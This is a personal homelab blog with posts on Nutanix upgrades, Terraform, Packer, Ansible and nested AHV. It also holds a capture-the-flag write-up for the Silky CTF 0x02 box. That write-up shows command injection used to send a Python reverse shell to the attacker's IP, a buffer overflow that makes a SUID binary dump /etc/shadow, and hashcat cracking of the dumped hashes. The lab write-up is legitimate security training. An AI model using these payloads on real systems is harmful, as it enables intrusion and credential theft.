Thursday, 3 August 2023

Nutanix CE 2.0 on ESXi AOS Upgrade Hangs

AOS Upgrade on ESXi from 6.5.2 to 6.5.3.6 hangs.

Issue

I have been trying to upgrade my ESXi-based Nutanix CE 2.0 cluster to a newer AOS version for a while, and it has caused issues. After kicking off the upgrade, LCM starts a root task which hangs at 60%. The AOS upgrade task for each node shows as cancelled in the tasks view and LCM stops responding.

Symptoms

  • LCM Root Task hung at 60%
  • LCM Tasks for each CVM upgrade showing as “Cancelled”
  • Running lcm_leader on a CVM returns no leader: “lcm leader is at none”
  • Trying to open LCM in Prism Element just shows “loading”

Investigation

/home/nutanix/data/logs/install.out shows that SCSI passthrough is no longer supported. “SCSI passthrough on ESX is no longer supported in NOS 4.5+”

Workaround

Comment out the check for SCSI passthrough in the installer script - /home/nutanix/data/installer/<version string>/bin/svm_upgrade - on each CVM, save, then wait. The exact path and line can be found in the install.out log referenced above.
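
To track the check down, grep for the message on each CVM; the installer path will contain your own version string, and this assumes the check in svm_upgrade carries the same wording as the log message:

grep -n "SCSI passthrough" /home/nutanix/data/logs/install.out
grep -n "SCSI passthrough" /home/nutanix/data/installer/*/bin/svm_upgrade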

LCM should kick back into life and the install should complete as normal.

Tailing the /home/nutanix/data/logs/install.out file shows that the install now continues.
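
For anyone following along, that’s simply:

tail -f /home/nutanix/data/logs/install.out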

Once complete, the new version is shown in the About Nutanix dialog.

Written with StackEdit.

Tuesday, 18 April 2023

Terraform, Nutanix AHV and Windows

Deploy a Windows Template using Terraform to Nutanix AHV

If you just want the template, check the GitHub repo.

This post assumes you already have a Windows image for your desired Server OS. The Autounattend.xml included here should work fine on Server 2016 through 2022 and will need some tweaks for a client OS.

I build my AHV images using Packer and have one for each OS type. The Terraform template assumes your image is using UEFI boot, but could easily be modified for BIOS boot. You will need to modify main.tf to add your image name to the map, or copy your template and name it the same as mine - efi-rf2-2022-packer - for instance.

Your image must be sysprepped. 
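
If your image pipeline doesn’t already handle this, a typical generalise-and-shutdown run from inside the template VM looks something like this (adjust the switches to suit how you capture the image):

C:\Windows\System32\Sysprep\sysprep.exe /generalize /oobe /shutdown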

# Select the correct image and product key
variable "images" {
  type = map(any)
  default = {
    "2016"      = "efi-rf2-2016-packer"
    "2016-core" = "efi-rf2-2016-core-packer"
    "2019"      = "efi-rf2-2019-packer"
    "2019-core" = "efi-rf2-2019-core-packer"
    "2022"      = "efi-rf2-2022-packer"
    "2022-core" = "efi-rf2-2022-core-packer"
  }
}

The image name in Nutanix for my 2022 server template is efi-rf2-2022-packer, so if you just want to test quickly, replace the entry in the map with an image you already have, e.g. "2022" = "myServerTemplate"

The os variable in terraform.tfvars maps into the table above (and also into the product key map).
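
For example, this terraform.tfvars line selects the efi-rf2-2022-packer image and the matching 2022 KMS key:

os = "2022"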

Breaking down the template

Taking a look at the main.tf file, the first section tells Terraform that we need the Nutanix provider.

terraform {
  required_providers {
    nutanix = {
      source = "nutanix/nutanix"
    }
  }
}

The next part sets up the connection to the Nutanix endpoint - Prism Central or Prism Element - pulling variables from our terraform.tfvars. Once connected, the data section gets the UUID of the first cluster. Since I’m connecting directly to Prism Element, that’s all that is needed for me. If you’re connecting to Prism Central you may need to include additional variables to select the correct cluster.

# Connection Variables
provider "nutanix" {
  endpoint     = var.nutanix_endpoint
  port         = var.nutanix_port
  insecure     = var.nutanix_insecure
  wait_timeout = var.nutanix_wait_timeout
}

# Get Cluster uuid
data "nutanix_clusters" "clusters" {
}
locals {
  cluster1 = data.nutanix_clusters.clusters.entities[0].metadata.uuid
}

The next section is a couple of maps which serve as a lookup table, converting the os variable into other useful values for later use. If os is 2022, then image_name = var.images[var.os] sets image_name to efi-rf2-2022-packer.

# Select the correct image and product key
variable "images" {
  type = map(any)
  default = {
    "2016"      = "efi-rf2-2016-packer"
    "2016-core" = "efi-rf2-2016-core-packer"
    "2019"      = "efi-rf2-2019-packer"
    "2019-core" = "efi-rf2-2019-core-packer"
    "2022"      = "efi-rf2-2022-packer"
    "2022-core" = "efi-rf2-2022-core-packer"
  }
}

# These are KMS keys available from Microsoft at:
# https://learn.microsoft.com/en-us/windows-server/get-started/kms-client-activation-keys
variable "product_keys" {
  type = map(any)
  default = {
    "2016"      = "CB7KF-BWN84-R7R2Y-793K2-8XDDG"
    "2016-core" = "CB7KF-BWN84-R7R2Y-793K2-8XDDG"
    "2019"      = "WMDGN-G9PQG-XVVXX-R3X43-63DFG"
    "2019-core" = "WMDGN-G9PQG-XVVXX-R3X43-63DFG"
    "2022"      = "WX4NM-KYWYW-QJJR4-XV3QB-6VM33"
    "2022-core" = "WX4NM-KYWYW-QJJR4-XV3QB-6VM33"
  }
}

data "nutanix_image" "disk_image" {
  image_name = var.images[var.os]
}

This just gets the nutanix subnet using the name supplied in the variable

#pull desired subnet data
data "nutanix_subnet" "subnet" {
  subnet_name = var.subnet_name
}

This is the interesting bit: the template_file section is what injects variables into the Autounattend.xml for autologon and domain join, and for executing a ps1 script from your web server for onward configuration of the system.

Right now, it obfuscates the local admin password, but the domain join password is added in plain text. There is an option to obfuscate this using the AccountData XML section instead, but it’s still easily reversible.

On security: this XML file is added to a CD-ROM image attached to the new VM and will be left mounted. You should have your first run script eject the CD-ROM so that the passwords contained in it are removed.
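
As an illustration only (this isn’t part of the repo), the first run script could eject any attached CD-ROM drives with something along these lines:

# Hypothetical first-run snippet: eject attached CD-ROM drives
$shell = New-Object -ComObject Shell.Application
$shell.Namespace(17).Items() |
    Where-Object { $_.Type -eq 'CD Drive' } |
    ForEach-Object { $_.InvokeVerb('Eject') }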

If you’ve not used Terraform before, note that the state files it creates are also considered sensitive, since they will contain usernames, passwords etc. If you’re planning to do this in production, investigate using remote state.
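
For example, a minimal backend block keeps the state off your workstation; the bucket and key names here are illustrative, and an S3-compatible backend is assumed (Azure, GCS and others work similarly):

terraform {
  backend "s3" {
    bucket = "my-terraform-state"
    key    = "nutanix/windows-vm.tfstate"
    region = "eu-west-2"
  }
}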

# Unattend.xml template
data "template_file" "autounattend" {
  template = file("${path.module}/Autounattend.xml")
  vars = {
    ADMIN_PASSWORD       = textencodebase64(join("", [var.admin_password, "AdministratorPassword"]), "UTF-16LE")
    AUTOLOGON_PASSWORD   = textencodebase64(join("", [var.admin_password, "Password"]), "UTF-16LE")
    ORG_NAME             = "Terraform Org"
    OWNER_NAME           = "Terraform Owner"
    TIMEZONE             = var.timezone
    PRODUCT_KEY          = var.product_keys[var.os]
    VM_NAME              = var.vm_name
    AD_DOMAIN_SHORT      = var.domain_shortname
    AD_DOMAIN            = var.domain
    AD_DOMAIN_USER       = var.domain_user
    AD_DOMAIN_PASSWORD   = var.domain_pw
    AD_DOMAIN_OU_PATH    = var.ou_path
    FIRST_RUN_SCRIPT_URI = var.first_run_script_uri
  }
}

Next is the main virtual machine resource section. VM settings are hard-coded here but can easily be parameterised.

# Virtual machine resource
resource "nutanix_virtual_machine" "virtual_machine_1" {
  # General Information
  name                 = var.vm_name
  description          = "Terraform Test VM"
  num_vcpus_per_socket = 4
  num_sockets          = 1
  memory_size_mib      = 8192
  boot_type            = "UEFI"

  guest_customization_sysprep = {
    install_type = "PREPARED"
    unattend_xml = base64encode(data.template_file.autounattend.rendered)
  }

  # VM Cluster
  cluster_uuid = local.cluster1

  # What networks will this be attached to?
  nic_list {
    subnet_uuid = data.nutanix_subnet.subnet.id
  }

  # What disk/cdrom configuration will this have?
  disk_list {
    data_source_reference = {
      kind = "image"
      uuid = data.nutanix_image.disk_image.id
    }
  }

  disk_list {
    # defining an additional entry in the disk_list array will create another.
    disk_size_mib   = 10240
  }
}

The last bit just outputs the IP of the new machine

# Show IP address
output "ip_address" {
  value = nutanix_virtual_machine.virtual_machine_1.nic_list_status[0].ip_endpoint_list[0].ip
}

And for completeness, here’s the Autounattend.xml template

Building a VM

To get started, install Terraform and make sure it’s available in your path. I’m using Windows / PowerShell for this, but it shouldn’t matter if your build host is on another OS.

Clone the repo

git clone https://github.com/bobalob/tf-nutanix

Modify the example terraform.tfvars file with your settings.

Set environment variables for usernames/passwords so they aren’t stored in plain text! Make sure to escape any PowerShell-specific characters like $ and `. If automating this step, consider using a password vault solution like Azure Key Vault.
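
Terraform picks up any environment variable named TF_VAR_<variable>, so in PowerShell you can prompt for the sensitive values rather than hard-coding them; the variable names below match the ones referenced above (check variables.tf in the repo for the full list):

# Prompt so the values never land in your console history or a tfvars file
$env:TF_VAR_admin_password = Read-Host -Prompt "Local admin password"
$env:TF_VAR_domain_pw      = Read-Host -Prompt "Domain join password"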

Make sure you’re in the right folder and run terraform init. This will download the required plugins and get you ready to run.

If this looks okay, run terraform plan

Again, if this looks OK you can apply with terraform apply

And here’s the script from the webserver executing

Have fun!

Written with StackEdit.

Tuesday, 7 March 2023

Ubuntu with packer on vSphere

Building Ubuntu Server 22.04 on vSphere with Packer

While using my home lab, I regularly need a fresh Ubuntu Server to install test software. Rather than use the built in templating in vSphere, I wanted to use Packer to build an image so that I can include the regular software I use and have it always be up to date when I start using the server.

I initially built the template using JSON, but since HCL is now the preferred language, I converted the template to HCL and used some new features like dynamic blocks. I’ve parameterised all of the vSphere values and included some values to be injected into the VM such as username, initial user password and some ssh keys in authorized_keys for the user.

If you want to follow along, clone the git repo…

git clone https://github.com/bobalob/packer-vsphere

cloning the repo

…and install Packer. If it isn’t available on your distribution, download it from HashiCorp.

sudo apt install packer

install packer

Here’s the main template. The source section defines the virtual machine ready to boot in vSphere and the build section defines what will happen after the OS has been installed.

The boot_command sends keys to the VM via the remote console and essentially types a boot command into the GRUB boot menu. This instructs the machine to load the user-data file from Packer’s built-in dynamic HTTP server. The user-data file has some basic information for subiquity (Ubuntu Server’s setup program) to install the OS.
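
For context, the user-data is a subiquity “autoinstall” document. A heavily trimmed sketch of the kind of thing it contains is below; the placeholder values are illustrative stand-ins for what build.sh swaps in, and the real file in the repo contains much more (storage, network, packages and so on):

#cloud-config
autoinstall:
  version: 1
  identity:
    hostname: ubuntu-template   # illustrative
    username: BUILD_USERNAME    # placeholder swapped in by build.sh (assumed)
    password: PASSWORD_HASH     # SHA-512 crypt hash generated by openssl (assumed)
  ssh:
    install-server: true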

The dynamic provisioner block is interesting since it iterates over the ssh_authorized_keys list variable and runs the echo | tee command multiple times inside the new VM.

Some of the variables in the user-data file are modified by build.sh prior to packer being executed, which I’ll show a bit later.

The template uses variables for most user input so it can be used in other environments

To provide user variables, a file named variables.auto.pkrvars.hcl can be placed in the files/ directory. SSH public keys can be placed in the ssh_authorized_keys variable which will be injected into the VM in the build step. An example variables.auto.pkrvars.hcl file:

temp_dns = "192.168.2.254"
temp_gw = "192.168.2.254"
temp_ip = "192.168.2.90"
temp_mask = "255.255.255.0"
vcenter_cluster = "mycluster.domain.local"
vcenter_datacenter = "Home"
vcenter_datastore = "Datastore1"
vcenter_iso_path = "[Datastore1] ISO/ubuntu-22.04.1-live-server-amd64.iso"
vcenter_network = "VM network"
vcenter_server = "vcenter.domain.local"
vcenter_user = "administrator@vsphere.local"
ssh_authorized_keys = [
    "ssh-rsa AAAAB3NzaC1... user@box1",
    "ssh-rsa AAAAB3NzaC1... user@box2"
]

The temporary IP is needed because, in my environment, the machine would get a different DHCP-assigned address after the first reboot and Packer would not reconnect to the new IP.

Running build.sh modifies some values in the user-data file that Ubuntu reads during setup. openssl generates a password hash for the user-supplied password, and there is a read command for the vCenter password so it isn’t entered on the command line or echoed to the screen.
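
A rough bash sketch of those two steps (the repo’s build.sh is the authoritative version):

# Generate a SHA-512 crypt hash for the initial user password
PASSWORD_HASH=$(openssl passwd -6 "$INITIAL_PASSWORD")

# Prompt for the vCenter password without echoing it to the terminal
read -rs -p "vCenter password: " VCENTER_PASSWORD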

And finally, here’s the provision.sh script that runs inside the VM once it’s built. The provision script just does an apt update/upgrade, cleans up the cloud-init configuration from the installer, expires the user’s password and resets their sudo configuration.

Building the machine

Running build.sh

running build.sh

packer typing the boot command

packer typing boot command

The build section of the template running. Notice that the ssh-rsa public keys are echoed twice; this is because the dynamic block in the build section of the template iterates over the list of keys provided in the variable.

packer running the build

Once the machine is built, logging in with my SSH key is possible. Since provision.sh expired the user password, we’re prompted to change the initial password at first login.

logging into the finished machine

I already have Ansible set up in my home lab, so I’ll try to integrate that into this build in the future.

Written with StackEdit.

Sunday, 26 June 2022

Vulnhub Writeup: Silky CTF 0x02

Vulnhub Writeup - Silky CTF 0x02

This is the first box on the OSWE track from TJNull’s infamous list

You can download the box from Vulnhub

Initial Scans

nmap -sn 192.168.21.0/24

Running AutoRecon on the box

sudo $(which autorecon) -vv 192.168.21.129

Open Ports

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))

Web site enumeration

There is a default Debian index page

Reviewing the feroxbuster log from AutoRecon on the machine reveals an admin.php page.

feroxbuster -u http://192.168.21.129:80/ -t 10 -w /root/.config/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e 

/admin.php

Clicking the login button shows a basic login panel

An invalid user / password combination results in the following error in German:

“Falscher Nutzernamen oder falsches Passwort”

Translation: “Wrong username or wrong password”

Fuzzing the login form

While testing the login page, I tried a basic WFUZZ to see if there are any differences in response when trying different usernames.

wfuzz -u "http://192.168.21.129/admin.php?username=FUZZ&password=test" -w /usr/share/wordlists/fasttrack.txt

The results show that the username trust gives a different-sized page response, which is interesting.
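
To cut the noise on a re-run, wfuzz can hide responses of the baseline size with --hh (substitute the character count that the failed logins return):

wfuzz -u "http://192.168.21.129/admin.php?username=FUZZ&password=test" -w /usr/share/wordlists/fasttrack.txt --hh <baseline_chars>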

Trying that name in a browser shows a strange error. Looks like it could be running trust as a command.

Let’s try another linux command - id

Nice, so it appears this is straight command injection! Trying which python results in the page showing the location of the python binary, so let’s try a python reverse shell.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.21.128",1998));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

On the attacker machine, I have set up a netcat listener with nc -lvnp 1998. Clicking Login on the login form initiates the reverse shell and a quick enumeration of the home folder shows we have read access to the user flag.

I can also see a SUID binary named cat_shadow which seems to suggest it will allow a normal user to read the /etc/shadow file!

Running ./cat_shadow shows the executable is expecting a password

At this point, I upgrade the shell to a proper TTY, which allows entering longer strings on the command line and responding to input requests from programs.

python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm-256color

I run strings cat_shadow > cat_strings.txt to see if there is anything really obvious in the binary that looks like it could be a password.

The password might be 0x496c5962

Reading each hex pair in 0x496c5962 as ASCII characters translates to “IlYb”.
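
A quick one-liner confirms the conversion:

python3 -c 'print(bytes.fromhex("496c5962").decode())'
# prints: IlYb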

Buffer overflow testing

Trying different passwords on the executable, cat_shadow gives some easy hints as to what’s happening. 0x00000000 != 0x496c5962 suggests the program is reading a memory location and comparing its contents to the magic value 0x496c5962. So I try longer and longer strings of ‘A’ characters to overflow the buffer and overwrite the memory location that it is checking. Once the value becomes 0x41414141, or ‘AAAA’, I change the end characters to ‘BBBB’ to confirm the correct memory location is being overwritten.
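
Rather than typing the padding by hand, a one-liner can generate each attempt; the count of 64 is illustrative, so adjust it until the overwrite lands:

./cat_shadow $(python3 -c 'print("A"*64 + "BBBB")')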

Trying with ‘BBBB’ and ‘CCCC’ to confirm the correct location is being overwritten.

./cat_shadow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC

Trying with the magic ASCII value calculated earlier.

./cat_shadow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIlYb

Since x86 is little-endian, the characters need to be reversed.

./cat_shadow AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAbYlI

And we get the shadow file!

The shadow file contains the user password hashes, so I can either crack the passwords or try to find a further bug in cat_shadow to change its behaviour.

root:$6$L69RL59x$ONQl06MP37LfjyFBGlQ5TYtdDqEZEe0yIZIuTHASQG/dgH3Te0fJII/Wtdbu0PA3D/RTxJURc.Ses60j0GFyF/:18012:0:99999:7:::
silky:$6$F0T5vQMg$BKnwGPZ17UHvqZLOVFVCUh6CrsZ5Eu8BLT1/uX3h44wtEoDt9qA2dYL04CMUXHw2Km9H.tttNiyaCHwQQ..2T0:18012:0:99999:7:::

Password Hash Cracking

I’ll try to crack the hashes. Reviewing the example_hashes for hashcat shows that these are type 1800, “sha512crypt $6$, SHA512 (Unix)”

Here is the hashcat command from my Windows machine; simply paste the lines from the shadow file into a file named silky.hashes:

.\hashcat -a 0 -m 1800 --username .\silky.hashes .\wordlists\rockyou.txt

And we get the password! Since the shell was upgraded to a tty earlier, it’s possible to use su and type the password.

Up to ten kilograms of cocoons are needed to obtain one kilogram of raw silk.

congratulation

And that’s the box.

Written with StackEdit.

Sunday, 19 June 2022

Ansible as fast as possible

A super quick start guide for Ansible. This is a getting-started guide only and should be sufficient to have you writing playbooks for your lab environment. Before moving to production, consider the security of the user account and review any roles for anything unexpected.

With that said:

sudo apt install ansible
cd ~
mkdir ansible
cd ansible

The inventory

The inventory is a list of machines that Ansible will run against. Machines can be grouped and groups can be nested. The inventory file can be generated dynamically or written statically as an INI or YAML formatted file. Here is a basic INI-formatted inventory file with a few hosts in the production and test groups.

I have assigned the ‘syslocation’ variable to the machines which can be used later. Click here for more information on inventory files, and here for more information on variables.

inventory.ini

[production]
server1.example.com syslocation="London, England"
server2.example.com syslocation="London, England"
[test]
server3.example.com
server4.example.com

SSH Access to machines

Before you can start pushing configuration to your inventory, you’ll need a user account that can access the machines, generally with root level privileges. For the lab setup we will create an ansible user which has passwordless sudo using an SSH key for access.

Create an ssh key on your control node, save the keys somewhere and update the bootstrap-ansible.yml below with the public key location

ssh-keygen

bootstrap-ansible.yml

- name: Ansible user account bootstrapping
  hosts: all
  become: yes
  vars:
    user_name: ansible

  tasks:
  
  - name: Make sure we have a 'wheel' group
    group:
      name: wheel
      state: present
      
  - name: Add the {{ user_name }} user
    user:
      name: "{{ user_name }}"
      shell: /bin/bash
      home: "/home/{{ user_name }}"
      groups: wheel
      append: yes
      createhome: yes
      state: present
      
  - name: Allow 'wheel' group to have passwordless sudo
    lineinfile:
      dest: /etc/sudoers
      state: present
      regexp: '^%wheel'
      line: '%wheel ALL=(ALL) NOPASSWD: ALL'
      validate: 'visudo -cf %s'
      
  - name: Set up authorized keys for the ansible user
    authorized_key:
      user: "{{ user_name }}"
      key: "{{ item }}"
    with_file:
      - /home/dave/ansible/id_rsa.pub 
      # Public key location goes above

The above file combines several Ansible modules into a playbook. The modules will create the user, allow passwordless sudo and assign our control node’s public key for SSH access.

Once you’ve created the bootstrap playbook and inventory, run the bootstrap playbook with -i inventory.ini -k -K -u username using a known sudo account in order to push the ansible user to each machine. Rerun the command as many times as needed with different credentials. If you’re connecting directly as root, omit the -K flag.

ansible-playbook -i ./inventory.ini ./bootstrap-ansible.yml -k -K -u <remote_sudo_user>

You can limit the above command to a single host by appending -l hostname.example.com, (note the trailing comma).

The command will fail for any machines that don’t have the user/password you are using on each run, but once you’ve covered every machine at least once, you’ll have a new user that Ansible can use everywhere.

Now that all your machines in the inventory have an ansible user with passwordless sudo capability, copy /etc/ansible/ansible.cfg to your working ansible directory and update the following values.

inventory = /home/<you>/ansible/inventory.ini
remote_user = ansible
private_key_file = /home/<you>/ansible/id_rsa

Run ansible --version to make sure you are using the new config file

Run the ping module command for all inventory to confirm connectivity (my screenshot is limited to a smaller group of machines called test_group)

ansible all -m ping

Now we can create a simple config yaml to install snmpd and copy a jinja2 file template to configure the snmpd service.

Create 2 files - configure_snmp.yml and snmpd.conf.j2

snmpd.conf.j2

agentAddress udp:161
rocommunity superSecretCommunity  192.168.55.55
rocommunity superSecretCommunity  127.0.0.1
sysLocation    {{ syslocation }}
sysContact     Dave <no@thanks.com>

Note the syslocation variable from earlier in the inventory file. Variables can be assigned in many places, such as the inventory, playbooks, for specific groups, etc.
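
For example, a group-level variable file sitting next to the inventory is picked up automatically and could set syslocation for every production host:

# group_vars/production.yml
syslocation: "London, England"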

configure_snmp.yml

- name: Configure snmp
  hosts: test_group
  become: yes
  vars:
    # Dynamic list based on OS type
    _packages:
      Debian:
        - snmpd
      RedHat:
        - net-snmp
    packages: "{{ _packages[ansible_os_family] }}"

    # Standard list
    services:
        - snmpd
        - sshd

  tasks:

  # Package module to install list of packages apt / yum
  - name: Install Packages
    package:
      name: "{{ packages }}"
      state: present

  # Use the jinja2 template to create a new snmpd.conf
  - name: snmpd conf file
    template:
      src: "/home/dave/ansible/snmpd/snmpd.conf.j2"
      dest: "/etc/snmp/snmpd.conf"
      backup: yes
      owner: root
      group: root
      mode: 0600
    notify:
      - restart snmpd

  # Loop over services list and make sure they are started and enabled
  - name: Ensure services are enabled
    ansible.builtin.service:
      name: "{{ item }}"
      state: started
      enabled: yes
    loop: "{{ services }}"

  handlers:

  # Handler called if the snmpd conf file is changed from template module above
  - name: restart snmpd
    ansible.builtin.service:
      name: snmpd
      state: restarted

Run a dry-run on the playbook to see what happens

ansible-playbook -C ./snmp/configure_snmp.yml

Because this is a dry run it will fail to start the snmpd service as it’s not yet installed. Run the playbook without a dry run to actually configure the services

ansible-playbook ./snmp/configure_snmp.yml

If we run it a second time, all should be in order and no changes will be required

ansible-playbook ./snmp/configure_snmp.yml

You can check out Ansible Galaxy for pre-written roles, saving you time on playbooks the community has already written. For example, there are roles on Ansible Galaxy for unattended-upgrades on Debian-based machines, dnf-automatic updates on Red Hat-based machines, and many other configurations.
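
Installing a role from Galaxy is a one-liner; the role name below is a placeholder, so search Galaxy for one that fits your needs:

ansible-galaxy search unattended-upgrades
ansible-galaxy install <namespace>.<role_name>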

For more information check out the Ansible Docs

If you’re interested and have the time, I recommend this Pluralsight course. You can get 1 month of free access to Pluralsight with Visual Studio Dev Essentials.

Written with StackEdit.

Friday, 29 October 2021

AHV nested inside Hyper-V

AHV in Hyper-V

AHV Running as a Hyper-V Guest VM

Want to test out Nutanix Community Edition but don’t have the hardware handy? If you have a decent Hyper-V host then it’s possible to install CE inside a guest VM in Hyper-V.

Unfortunately the ISO you can download direct from Nutanix fails when checking for network interfaces during the install. Attempting to install straight from the ISO with regular or legacy NICs results in the following error:

FATAL An exception was raised: Traceback (most recent call last):
  File "./phoenix", line 125, in <module>
   main()
  File "./phoenix", line 84, in main
    params = gui.get_params(gui.CEGui)
  File "/root/phoenix/gui.py", line 1805, in get_params
    sysUtil.detect_params(gp.p_list, throw_on_fatal=False, skip_esx_info=True)
  File "/root/phoenix/sysUtil.py", line 974, in detect_params
    param_list.cluster_id = get_cluster_id()
  File "/root/phoenix/sysUtil.py", line 974, in get_cluster_id
    cluster_id = int(randomizer + mac_addrs[0].replace(':',''), 16)
IndexError: list index out of range

CE NIC Error

It is however possible to modify the installer so it can detect Hyper-V guest network interfaces and successfully install and start a new single node cluster.

The requirements for the guest VM are not insignificant, so you’ll need the following.

VM Specification

  • Generation 1 VM (BIOS Boot)
  • 4+ vCPU Cores (I have tested with 8)
  • 22 GB+ RAM, Statically Assigned
  • 3 Dynamically Expanding VHDs attached to IDE interface
    • 32 GB AHV Boot Disk
    • 256 GB CVM & Data (Must be SSD backed)
    • 512 GB Data Disk
  • Nested Virtualisation enabled on the VM
  • At least one NIC with MAC address spoofing enabled, so that the CVM and guest VMs can get out to the network (see the command below)
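
MAC address spoofing can be enabled per NIC from PowerShell, for example:

Set-VMNetworkAdapter -VMName <VMName> -MacAddressSpoofing On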

VM Settings Dialog


Start by downloading the ce-2020.09.16.iso from the Nutanix Community Edition forum (Requires Registration.)

Patch the ISO using the patch.sh script from the repo below. I used a fresh, temporary Ubuntu 20.04 Server VM to patch the ISO; it’s possible the script would work in WSL, but I haven’t tested that. The script just modifies a few lines in some of the setup Python scripts. You may be able to do this manually, but it requires unpacking and repacking the initrd file on the ISO in a very specific way.

This is an alpha-grade script, so use it at your own risk.

The script has some prerequisites to install.

sudo apt install genisoimage

Then copy your downloaded ce-2020.09.16.iso file to the iso directory and run the script.

git clone https://github.com/bobalob/ahv-on-hyperv
mkdir ./ahv-on-hyperv/iso
cp ~/Downloads/ce-2020.09.16.iso ./ahv-on-hyperv/iso/
cd ahv-on-hyperv/
chmod +x patch.sh
./patch.sh

Pre Patching

Once finished it should look a bit like this.

Patched

If your Ubuntu machine has KVM/QEMU installed, it will boot the ISO; this is expected to fail as there are no disks attached, and you can safely stop the VM. Once patched, copy the new ce-2020.09.16-hv-mkiso.iso from your Ubuntu machine to your Hyper-V host.

Create a new virtual machine with the above specification, then enable nested virtualisation with the following command

Set-VMProcessor -VMName <VMName> -ExposeVirtualizationExtensions $true

Attach the patched ISO ce-2020.09.16-hv-mkiso.iso and boot the VM.

Booting the VM

Installation

Follow the normal path to install

Installation 1

Installation 2

Install Complete

Installation Complete

Prism Running!

Remove the ISO from the VM and reboot when told; give it 15-20 minutes to start up. Enjoy your new dev AHV/AOS installation.

CVM is UP!

Prism is UP!

Written with StackEdit.
